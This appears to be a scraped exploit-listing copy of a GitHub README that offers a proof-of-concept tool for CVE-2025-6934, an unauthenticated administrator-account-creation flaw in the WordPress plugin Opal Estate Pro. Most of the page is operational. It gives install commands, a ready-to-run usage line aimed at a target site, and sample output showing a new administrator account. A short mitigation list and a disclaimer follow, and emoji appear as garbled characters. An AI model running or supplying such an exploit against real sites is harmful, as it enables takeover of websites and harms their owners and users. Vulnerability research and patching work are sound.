## https://sploitus.com/exploit?id=65FAD546-0AA8-531B-9227-B4AAD843EB1B
# CVE-2025-6934 β WordPress Opal Estate Pro Exploit
π Description
This repository contains a **Proof of Concept (PoC) exploit** for **CVE-2025-6934**,
a critical vulnerability in **WordPress Plugin: Opal Estate Pro <= 1.7.5**, allowing **unauthenticated administrator account creation**.
β οΈ **Disclaimer**: This tool is provided for **educational and security research purposes only**.
The author is **not responsible** for any misuse or damage caused.
---
## π Features
- Automatic detection of plugin version from `readme.txt`
- Nonce extraction for registration
- Exploits vulnerable AJAX endpoint
- Creates a new **administrator account**
---
## π§ Installation
Clone the repo and install dependencies:
```bash
git clone https://github.com/0xgh057r3c0n/CVE-2025-6934.git
cd CVE-2025-6934
pip3 install -r requirements.txt
````
**requirements.txt**
```
requests
beautifulsoup4
colorama
```
---
## βΆοΈ Usage
Run the script with your target:
```bash
python3 CVE-2025-6934.py -u http://target.com/ -mail newadmin@mail.com -password MySecurePass123 -user newadmin
```
β
Example Output:
```
[β] Exploit Successful!
Username : newadmin
Email : newadmin@mail.com
Password : MySecurePass123
Role : administrator
```
---
## πΈ Screenshot

---
## π‘οΈ Mitigation
* Update to the **latest version** of the plugin
* Or disable the vulnerable plugin immediately
* Monitor WordPress logs for unauthorized account creation
---
## π€ Author
**Gaurav Bhattacharjee** (0xgh057r3c0n)
---
## π License
This project is licensed under the **MIT License** β see the [LICENSE](LICENSE) file for details.